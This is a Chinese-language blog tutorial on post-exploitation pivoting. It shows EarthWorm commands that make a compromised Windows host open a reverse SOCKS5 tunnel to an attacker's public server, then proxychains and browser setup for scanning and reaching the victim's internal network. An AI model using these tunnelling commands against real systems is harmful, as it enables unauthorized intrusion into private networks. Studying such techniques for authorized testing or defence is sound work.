如何通過EW做Socks5代理進行內網滲透
0x00 前言
最近搞站的時候有內網穿透的需求,大佬向我推薦了EW,本文模擬一個攻擊場景對Earthworm的使用方法做一個簡單的介紹。其實相應的內容EW的官網已經說得很詳細了,我這裡純粹是作為個人筆記從如下幾個方面做一個簡單的記錄:
1、如何使用EW做反向Socks5代理
2、瀏覽器如何設置Socks5代理訪問目標內網Web服務
3、利用proxychains給終端設置Socks5代理(方便將本地命令行工具的流量代理進目標內網)
0x01 基礎環境及網路拓撲
Kali Linux(Attacker 內網 192.168.40.135)
Ubuntu 16.04.3(Attacker 公網 http://120.xxxx.xxx.xxx)
Windows Server 2008(Victim 目標內網 http://10.xxxx.xxx.xxx)
網路拓撲:Kali Linux是我本地的一台虛擬機,Ubuntu是公網上的一台ECS,Windows Server 2008是目標機器,內網IP,部分埠映射到外網。
此處應該有一個拓撲圖,等我之後學習下Visio,在把圖補充上來23333
0x02 場景模擬
我們現在已拿到目標內網一台機器的許可權(該機器將80埠映射至外網,Web服務存在漏洞,已拿到webshell)。需要對內網做進一步的滲透,目前我有一台公網的Ubuntu,一台內網的Kali,如何反向Socks5將Kali的流量代理進目標內網?
0x03 使用EW做反向Socks5代理
這裡我僅演示通過EW做反向Socks5代理,正向、多級級聯的的代理方式可以參考官方文檔。
第1步:在公網的Ubuntu上執行如下命令:
./ew_for_linux64 -s rcsocks -l 1080 -e 1024 &
該命令的意思是說公網機器監聽1080和1024埠。等待攻擊者機器訪問1080埠,目標機器訪問1024埠。
第2步:目標機器執行如下命令:
ew_for_Win.exe -s rssocks -d 120.xxx.xxx.xx -e 1024
其中-d參數的值為剛剛的公網IP
第3步:攻擊者機器通過proxychains或瀏覽器設置Socks5代理訪問目標內網服務
0x04 瀏覽器設置Socks5代理
設置完畢後點擊確定即可。此時已可以通過瀏覽器訪問目標內網的Web服務。
0x05 使用proxychains給終端設置Socks5代理
第1步:下載及安裝proxychains
cd /usr/local/srcgit clone https://github.com/rofl0r/proxychains-ng.gitcd proxychains-ng ./configure --prefix=/usr --sysconfdir=/etcmake && make installmake install-configcd .. && rm -rf proxychains-ng
第2步:編輯proxychains配置文件設置代理
vi /etc/proxychains.confsocks5 120.xx.xx.xx 1080
第3步:舉個栗子:使用proxychains nmap對目標內網掃描
設置完成後即可使用類似proxychains nmap 192.168.40.133這種方式將nmap的流量代理至目標內網進行掃描,其他命令行工具同理。
0x06 後記
在使用的過程中也出現了一些問題,有的工具流量不走sock5代理,就很尷尬,具體原因不詳。有點困了,回家睡覺,剩下的問題明天再解決。身體是革命的本錢。
希望對這方面內容感興趣的同學偶然看到了這篇文章能有所收穫吧,當然,如有謬誤還請不吝賜教。
0x07 參考鏈接
針對國內一大廠的後滲透 - 持續
利用proxychains在終端使用socks5代理 - CSDN博客
https://jingyan.baidu.com/album/b87fe19e9c0f9d5218356829.html?picindex=2
EarthWorm
推薦閱讀: